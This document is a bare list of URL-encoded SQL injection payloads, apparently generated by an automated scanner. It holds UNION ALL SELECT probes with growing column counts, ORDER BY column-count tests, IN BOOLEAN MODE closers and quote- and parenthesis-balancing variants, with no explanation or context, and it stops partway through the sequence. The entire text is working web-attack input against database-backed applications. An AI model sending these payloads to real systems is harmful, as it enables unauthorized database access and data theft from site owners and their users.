-8627%27%20%2B%20%28SELECT%20%27ljCB%27%20FROM%20DUAL%20WHERE%201221%3D1221%20UNION%20ALL%20SELECT%201221%2C%201221%2C%201221%2C%201221%2C%201221%2C%201221%2C%201221%2C%201221%2C%201221%2C%201221%2C%201221%2C%201221%2C%201221%2C%201221%2C%201221%2C%201221%2C%201221%2C%201221%2C%201221%2C%201221%2C%201221%2C%201221%2C%201221%2C%201221%2C%201221%2C%201221%2C%201221%2C%201221%2C%201221%2C%201221%2C%201221%2C%201221%2C%201221%2C%201221%2C%201221%2C%201221%2C%201221%2C%201221%2C%201221%2C%201221%2C%201221%2C%201221%2C%201221%2C%201221%2C%201221%2C%201221%23%20%29%20%2B%20%27 -9151%27%20%2B%20%28SELECT%20%27ubuu%27%20FROM%20DUAL%20WHERE%209771%3D9771%20UNION%20ALL%20SELECT%209771%2C%209771%2C%209771%2C%209771%2C%209771%2C%209771%2C%209771%2C%209771%2C%209771%2C%209771%2C%209771%2C%209771%2C%209771%2C%209771%2C%209771%2C%209771%2C%209771%2C%209771%2C%209771%2C%209771%2C%209771%2C%209771%2C%209771%2C%209771%2C%209771%2C%209771%2C%209771%2C%209771%2C%209771%2C%209771%2C%209771%2C%209771%2C%209771%2C%209771%2C%209771%2C%209771%2C%209771%2C%209771%2C%209771%2C%209771%2C%209771%2C%209771%2C%209771%2C%209771%2C%209771%2C%209771%2C%209771%23%20%29%20%2B%20%27 -2532%27%20%2B%20%28SELECT%20%27VrYi%27%20FROM%20DUAL%20WHERE%204948%3D4948%20UNION%20ALL%20SELECT%204948%2C%204948%2C%204948%2C%204948%2C%204948%2C%204948%2C%204948%2C%204948%2C%204948%2C%204948%2C%204948%2C%204948%2C%204948%2C%204948%2C%204948%2C%204948%2C%204948%2C%204948%2C%204948%2C%204948%2C%204948%2C%204948%2C%204948%2C%204948%2C%204948%2C%204948%2C%204948%2C%204948%2C%204948%2C%204948%2C%204948%2C%204948%2C%204948%2C%204948%2C%204948%2C%204948%2C%204948%2C%204948%2C%204948%2C%204948%2C%204948%2C%204948%2C%204948%2C%204948%2C%204948%2C%204948%2C%204948%2C%204948%23%20%29%20%2B%20%27 -1136%27%20%2B%20%28SELECT%20%27AIFS%27%20FROM%20DUAL%20WHERE%205560%3D5560%20UNION%20ALL%20SELECT%205560%2C%205560%2C%205560%2C%205560%2C%205560%2C%205560%2C%205560%2C%205560%2C%205560%2C%205560%2C%205560%2C%205560%2C%205560%2C%205560%2C%205560%2C%205560%2C%205560%2C%205560%2C%205560%2C%205560%2C%205560%2C%205560%2C%205560%2C%205560%2C%205560%2C%205560%2C%205560%2C%205560%2C%205560%2C%205560%2C%205560%2C%205560%2C%205560%2C%205560%2C%205560%2C%205560%2C%205560%2C%205560%2C%205560%2C%205560%2C%205560%2C%205560%2C%205560%2C%205560%2C%205560%2C%205560%2C%205560%2C%205560%2C%205560%23%20%29%20%2B%20%27 -2809%27%20%2B%20%28SELECT%20%27XcFa%27%20FROM%20DUAL%20WHERE%204225%3D4225%20UNION%20ALL%20SELECT%204225%2C%204225%2C%204225%2C%204225%2C%204225%2C%204225%2C%204225%2C%204225%2C%204225%2C%204225%2C%204225%2C%204225%2C%204225%2C%204225%2C%204225%2C%204225%2C%204225%2C%204225%2C%204225%2C%204225%2C%204225%2C%204225%2C%204225%2C%204225%2C%204225%2C%204225%2C%204225%2C%204225%2C%204225%2C%204225%2C%204225%2C%204225%2C%204225%2C%204225%2C%204225%2C%204225%2C%204225%2C%204225%2C%204225%2C%204225%2C%204225%2C%204225%2C%204225%2C%204225%2C%204225%2C%204225%2C%204225%2C%204225%2C%204225%2C%204225%23%20%29%20%2B%20%27 -9424%27%20%2B%20%28SELECT%20%27qttJ%27%20WHERE%206474%3D6474%20UNION%20ALL%20SELECT%206474%2C%206474%2C%206474%2C%206474%2C%206474%2C%206474%2C%206474%2C%206474%2C%206474%2C%206474%2C%206474%2C%206474%2C%206474%2C%206474%2C%206474%2C%206474%2C%206474%2C%206474%2C%206474%2C%206474%2C%206474%2C%206474%2C%206474%2C%206474%2C%206474%2C%206474%2C%206474%2C%206474%2C%206474%2C%206474%2C%206474%2C%206474%2C%206474%2C%206474%2C%206474%2C%206474%2C%206474%2C%206474%2C%206474%2C%206474%2C%206474%23%20%29%20%2B%20%27 -7607%27%20%2B%20%28SELECT%20%27oCyY%27%20WHERE%206204%3D6204%20UNION%20ALL%20SELECT%206204%2C%206204%2C%206204%2C%206204%2C%206204%2C%206204%2C%206204%2C%206204%2C%206204%2C%206204%2C%206204%2C%206204%2C%206204%2C%206204%2C%206204%2C%206204%2C%206204%2C%206204%2C%206204%2C%206204%2C%206204%2C%206204%2C%206204%2C%206204%2C%206204%2C%206204%2C%206204%2C%206204%2C%206204%2C%206204%2C%206204%2C%206204%2C%206204%2C%206204%2C%206204%2C%206204%2C%206204%2C%206204%2C%206204%2C%206204%2C%206204%2C%206204%23%20%29%20%2B%20%27 -4440%27%20%2B%20%28SELECT%20%27xiOl%27%20WHERE%209900%3D9900%20UNION%20ALL%20SELECT%209900%2C%209900%2C%209900%2C%209900%2C%209900%2C%209900%2C%209900%2C%209900%2C%209900%2C%209900%2C%209900%2C%209900%2C%209900%2C%209900%2C%209900%2C%209900%2C%209900%2C%209900%2C%209900%2C%209900%2C%209900%2C%209900%2C%209900%2C%209900%2C%209900%2C%209900%2C%209900%2C%209900%2C%209900%2C%209900%2C%209900%2C%209900%2C%209900%2C%209900%2C%209900%2C%209900%2C%209900%2C%209900%2C%209900%2C%209900%2C%209900%2C%209900%2C%209900%23%20%29%20%2B%20%27 -3557%27%20%2B%20%28SELECT%20%27nMEx%27%20WHERE%201544%3D1544%20UNION%20ALL%20SELECT%201544%2C%201544%2C%201544%2C%201544%2C%201544%2C%201544%2C%201544%2C%201544%2C%201544%2C%201544%2C%201544%2C%201544%2C%201544%2C%201544%2C%201544%2C%201544%2C%201544%2C%201544%2C%201544%2C%201544%2C%201544%2C%201544%2C%201544%2C%201544%2C%201544%2C%201544%2C%201544%2C%201544%2C%201544%2C%201544%2C%201544%2C%201544%2C%201544%2C%201544%2C%201544%2C%201544%2C%201544%2C%201544%2C%201544%2C%201544%2C%201544%2C%201544%2C%201544%2C%201544%23%20%29%20%2B%20%27 -5639%27%20%2B%20%28SELECT%20%27LZVq%27%20WHERE%207564%3D7564%20UNION%20ALL%20SELECT%207564%2C%207564%2C%207564%2C%207564%2C%207564%2C%207564%2C%207564%2C%207564%2C%207564%2C%207564%2C%207564%2C%207564%2C%207564%2C%207564%2C%207564%2C%207564%2C%207564%2C%207564%2C%207564%2C%207564%2C%207564%2C%207564%2C%207564%2C%207564%2C%207564%2C%207564%2C%207564%2C%207564%2C%207564%2C%207564%2C%207564%2C%207564%2C%207564%2C%207564%2C%207564%2C%207564%2C%207564%2C%207564%2C%207564%2C%207564%2C%207564%2C%207564%2C%207564%2C%207564%2C%207564%23%20%29%20%2B%20%27 -1137%27%20%2B%20%28SELECT%20%27roAx%27%20WHERE%207506%3D7506%20UNION%20ALL%20SELECT%207506%2C%207506%2C%207506%2C%207506%2C%207506%2C%207506%2C%207506%2C%207506%2C%207506%2C%207506%2C%207506%2C%207506%2C%207506%2C%207506%2C%207506%2C%207506%2C%207506%2C%207506%2C%207506%2C%207506%2C%207506%2C%207506%2C%207506%2C%207506%2C%207506%2C%207506%2C%207506%2C%207506%2C%207506%2C%207506%2C%207506%2C%207506%2C%207506%2C%207506%2C%207506%2C%207506%2C%207506%2C%207506%2C%207506%2C%207506%2C%207506%2C%207506%2C%207506%2C%207506%2C%207506%2C%207506%23%20%29%20%2B%20%27 -2040%27%20%2B%20%28SELECT%20%27DIPE%27%20WHERE%204305%3D4305%20UNION%20ALL%20SELECT%204305%2C%204305%2C%204305%2C%204305%2C%204305%2C%204305%2C%204305%2C%204305%2C%204305%2C%204305%2C%204305%2C%204305%2C%204305%2C%204305%2C%204305%2C%204305%2C%204305%2C%204305%2C%204305%2C%204305%2C%204305%2C%204305%2C%204305%2C%204305%2C%204305%2C%204305%2C%204305%2C%204305%2C%204305%2C%204305%2C%204305%2C%204305%2C%204305%2C%204305%2C%204305%2C%204305%2C%204305%2C%204305%2C%204305%2C%204305%2C%204305%2C%204305%2C%204305%2C%204305%2C%204305%2C%204305%2C%204305%23%20%29%20%2B%20%27 -1953%27%20%2B%20%28SELECT%20%27svGN%27%20WHERE%204721%3D4721%20UNION%20ALL%20SELECT%204721%2C%204721%2C%204721%2C%204721%2C%204721%2C%204721%2C%204721%2C%204721%2C%204721%2C%204721%2C%204721%2C%204721%2C%204721%2C%204721%2C%204721%2C%204721%2C%204721%2C%204721%2C%204721%2C%204721%2C%204721%2C%204721%2C%204721%2C%204721%2C%204721%2C%204721%2C%204721%2C%204721%2C%204721%2C%204721%2C%204721%2C%204721%2C%204721%2C%204721%2C%204721%2C%204721%2C%204721%2C%204721%2C%204721%2C%204721%2C%204721%2C%204721%2C%204721%2C%204721%2C%204721%2C%204721%2C%204721%2C%204721%23%20%29%20%2B%20%27 -5805%27%20%2B%20%28SELECT%20%27EpCr%27%20WHERE%203341%3D3341%20UNION%20ALL%20SELECT%203341%2C%203341%2C%203341%2C%203341%2C%203341%2C%203341%2C%203341%2C%203341%2C%203341%2C%203341%2C%203341%2C%203341%2C%203341%2C%203341%2C%203341%2C%203341%2C%203341%2C%203341%2C%203341%2C%203341%2C%203341%2C%203341%2C%203341%2C%203341%2C%203341%2C%203341%2C%203341%2C%203341%2C%203341%2C%203341%2C%203341%2C%203341%2C%203341%2C%203341%2C%203341%2C%203341%2C%203341%2C%203341%2C%203341%2C%203341%2C%203341%2C%203341%2C%203341%2C%203341%2C%203341%2C%203341%2C%203341%2C%203341%2C%203341%23%20%29%20%2B%20%27 -6287%27%20%2B%20%28SELECT%20%27Acla%27%20WHERE%205834%3D5834%20UNION%20ALL%20SELECT%205834%2C%205834%2C%205834%2C%205834%2C%205834%2C%205834%2C%205834%2C%205834%2C%205834%2C%205834%2C%205834%2C%205834%2C%205834%2C%205834%2C%205834%2C%205834%2C%205834%2C%205834%2C%205834%2C%205834%2C%205834%2C%205834%2C%205834%2C%205834%2C%205834%2C%205834%2C%205834%2C%205834%2C%205834%2C%205834%2C%205834%2C%205834%2C%205834%2C%205834%2C%205834%2C%205834%2C%205834%2C%205834%2C%205834%2C%205834%2C%205834%2C%205834%2C%205834%2C%205834%2C%205834%2C%205834%2C%205834%2C%205834%2C%205834%2C%205834%23%20%29%20%2B%20%27 -1308%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%204576%2C%204576%2C%204576%2C%204576%2C%204576%2C%204576%2C%204576%2C%204576%2C%204576%2C%204576%2C%204576%2C%204576%2C%204576%2C%204576%2C%204576%2C%204576%2C%204576%2C%204576%2C%204576%2C%204576%2C%204576%2C%204576%2C%204576%2C%204576%2C%204576%2C%204576%2C%204576%2C%204576%2C%204576%2C%204576%2C%204576%2C%204576%2C%204576%2C%204576%2C%204576%2C%204576%2C%204576%2C%204576%2C%204576%2C%204576%2C%204576%23%20%23 -9519%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%206297%2C%206297%2C%206297%2C%206297%2C%206297%2C%206297%2C%206297%2C%206297%2C%206297%2C%206297%2C%206297%2C%206297%2C%206297%2C%206297%2C%206297%2C%206297%2C%206297%2C%206297%2C%206297%2C%206297%2C%206297%2C%206297%2C%206297%2C%206297%2C%206297%2C%206297%2C%206297%2C%206297%2C%206297%2C%206297%2C%206297%2C%206297%2C%206297%2C%206297%2C%206297%2C%206297%2C%206297%2C%206297%2C%206297%2C%206297%2C%206297%2C%206297%23%20%23 -7915%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%203966%2C%203966%2C%203966%2C%203966%2C%203966%2C%203966%2C%203966%2C%203966%2C%203966%2C%203966%2C%203966%2C%203966%2C%203966%2C%203966%2C%203966%2C%203966%2C%203966%2C%203966%2C%203966%2C%203966%2C%203966%2C%203966%2C%203966%2C%203966%2C%203966%2C%203966%2C%203966%2C%203966%2C%203966%2C%203966%2C%203966%2C%203966%2C%203966%2C%203966%2C%203966%2C%203966%2C%203966%2C%203966%2C%203966%2C%203966%2C%203966%2C%203966%2C%203966%23%20%23 -3632%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%207526%2C%207526%2C%207526%2C%207526%2C%207526%2C%207526%2C%207526%2C%207526%2C%207526%2C%207526%2C%207526%2C%207526%2C%207526%2C%207526%2C%207526%2C%207526%2C%207526%2C%207526%2C%207526%2C%207526%2C%207526%2C%207526%2C%207526%2C%207526%2C%207526%2C%207526%2C%207526%2C%207526%2C%207526%2C%207526%2C%207526%2C%207526%2C%207526%2C%207526%2C%207526%2C%207526%2C%207526%2C%207526%2C%207526%2C%207526%2C%207526%2C%207526%2C%207526%2C%207526%23%20%23 -2175%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%209734%2C%209734%2C%209734%2C%209734%2C%209734%2C%209734%2C%209734%2C%209734%2C%209734%2C%209734%2C%209734%2C%209734%2C%209734%2C%209734%2C%209734%2C%209734%2C%209734%2C%209734%2C%209734%2C%209734%2C%209734%2C%209734%2C%209734%2C%209734%2C%209734%2C%209734%2C%209734%2C%209734%2C%209734%2C%209734%2C%209734%2C%209734%2C%209734%2C%209734%2C%209734%2C%209734%2C%209734%2C%209734%2C%209734%2C%209734%2C%209734%2C%209734%2C%209734%2C%209734%2C%209734%23%20%23 -7407%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%206771%2C%206771%2C%206771%2C%206771%2C%206771%2C%206771%2C%206771%2C%206771%2C%206771%2C%206771%2C%206771%2C%206771%2C%206771%2C%206771%2C%206771%2C%206771%2C%206771%2C%206771%2C%206771%2C%206771%2C%206771%2C%206771%2C%206771%2C%206771%2C%206771%2C%206771%2C%206771%2C%206771%2C%206771%2C%206771%2C%206771%2C%206771%2C%206771%2C%206771%2C%206771%2C%206771%2C%206771%2C%206771%2C%206771%2C%206771%2C%206771%2C%206771%2C%206771%2C%206771%2C%206771%2C%206771%23%20%23 -4107%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%209189%2C%209189%2C%209189%2C%209189%2C%209189%2C%209189%2C%209189%2C%209189%2C%209189%2C%209189%2C%209189%2C%209189%2C%209189%2C%209189%2C%209189%2C%209189%2C%209189%2C%209189%2C%209189%2C%209189%2C%209189%2C%209189%2C%209189%2C%209189%2C%209189%2C%209189%2C%209189%2C%209189%2C%209189%2C%209189%2C%209189%2C%209189%2C%209189%2C%209189%2C%209189%2C%209189%2C%209189%2C%209189%2C%209189%2C%209189%2C%209189%2C%209189%2C%209189%2C%209189%2C%209189%2C%209189%2C%209189%23%20%23 -2279%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%205075%2C%205075%2C%205075%2C%205075%2C%205075%2C%205075%2C%205075%2C%205075%2C%205075%2C%205075%2C%205075%2C%205075%2C%205075%2C%205075%2C%205075%2C%205075%2C%205075%2C%205075%2C%205075%2C%205075%2C%205075%2C%205075%2C%205075%2C%205075%2C%205075%2C%205075%2C%205075%2C%205075%2C%205075%2C%205075%2C%205075%2C%205075%2C%205075%2C%205075%2C%205075%2C%205075%2C%205075%2C%205075%2C%205075%2C%205075%2C%205075%2C%205075%2C%205075%2C%205075%2C%205075%2C%205075%2C%205075%2C%205075%23%20%23 -8574%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%203601%2C%203601%2C%203601%2C%203601%2C%203601%2C%203601%2C%203601%2C%203601%2C%203601%2C%203601%2C%203601%2C%203601%2C%203601%2C%203601%2C%203601%2C%203601%2C%203601%2C%203601%2C%203601%2C%203601%2C%203601%2C%203601%2C%203601%2C%203601%2C%203601%2C%203601%2C%203601%2C%203601%2C%203601%2C%203601%2C%203601%2C%203601%2C%203601%2C%203601%2C%203601%2C%203601%2C%203601%2C%203601%2C%203601%2C%203601%2C%203601%2C%203601%2C%203601%2C%203601%2C%203601%2C%203601%2C%203601%2C%203601%2C%203601%23%20%23 -4173%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%206196%2C%206196%2C%206196%2C%206196%2C%206196%2C%206196%2C%206196%2C%206196%2C%206196%2C%206196%2C%206196%2C%206196%2C%206196%2C%206196%2C%206196%2C%206196%2C%206196%2C%206196%2C%206196%2C%206196%2C%206196%2C%206196%2C%206196%2C%206196%2C%206196%2C%206196%2C%206196%2C%206196%2C%206196%2C%206196%2C%206196%2C%206196%2C%206196%2C%206196%2C%206196%2C%206196%2C%206196%2C%206196%2C%206196%2C%206196%2C%206196%2C%206196%2C%206196%2C%206196%2C%206196%2C%206196%2C%206196%2C%206196%2C%206196%2C%206196%23%20%23 1234.5%29%20ORDER%20BY%201--%20 1234.5%29%20ORDER%20BY%202758--%20 1234.5%29%20UNION%20ALL%20SELECT%20NULL--%20 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL--%20 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%29%20ORDER%20BY%201--%20 1234.5%27%29%20ORDER%20BY%206352--%20 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL--%20 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL--%20 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%20ORDER%20BY%201--%20 1234.5%27%20ORDER%20BY%205035--%20 1234.5%27%20UNION%20ALL%20SELECT%20NULL--%20 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL--%20 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%22%20ORDER%20BY%201--%20 1234.5%22%20ORDER%20BY%201540--%20 1234.5%22%20UNION%20ALL%20SELECT%20NULL--%20 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL--%20 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%29%20ORDER%20BY%201--%20%20AND%20%284632%3D4632 1234.5%29%20ORDER%20BY%202242--%20%20AND%20%281814%3D1814 1234.5%29%20UNION%20ALL%20SELECT%20NULL--%20%20AND%20%285954%3D5954 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL--%20%20AND%20%283372%3D3372 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%284783%3D4783 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%284500%3D4500 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%284595%3D4595 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%289366%3D9366 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%285735%3D5735 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%289005%3D9005 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%288008%3D8008 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%282909%3D2909 1234.5%29%29%20ORDER%20BY%201--%20%20AND%20%28%287294%3D7294 1234.5%29%29%20ORDER%20BY%204843--%20%20AND%20%28%286324%3D6324 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL--%20%20AND%20%28%281257%3D1257 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL--%20%20AND%20%28%284362%3D4362 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%284076%3D4076 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%281373%3D1373 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%285720%3D5720 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%287092%3D7092 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%286705%3D6705 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%289105%3D9105 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%285999%3D5999 1234.5%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%283598%3D3598 1234.5%29%29%29%20ORDER%20BY%201--%20%20AND%20%28%28%288485%3D8485 1234.5%29%29%29%20ORDER%20BY%207015--%20%20AND%20%28%28%286906%3D6906 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL--%20%20AND%20%28%28%285689%3D5689 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL--%20%20AND%20%28%28%285894%3D5894 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%286020%3D6020 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%285336%3D5336 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%284090%3D4090 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%287345%3D7345 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%281358%3D1358 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%283531%3D3531 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%284214%3D4214 1234.5%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20AND%20%28%28%286944%3D6944 1234.5%20ORDER%20BY%201--%20 1234.5%20ORDER%20BY%203785--%20 1234.5%20UNION%20ALL%20SELECT%20NULL--%20 1234.5%20UNION%20ALL%20SELECT%20NULL%2C%20NULL--%20 1234.5%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20 1234.5%27%29%20ORDER%20BY%201--%20%20AND%20%28%27zQjL%27%3D%27zQjL 1234.5%27%29%20ORDER%20BY%204653--%20%20AND%20%28%27xpHr%27%3D%27xpHr 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL--%20%20AND%20%28%27upXE%27%3D%27upXE 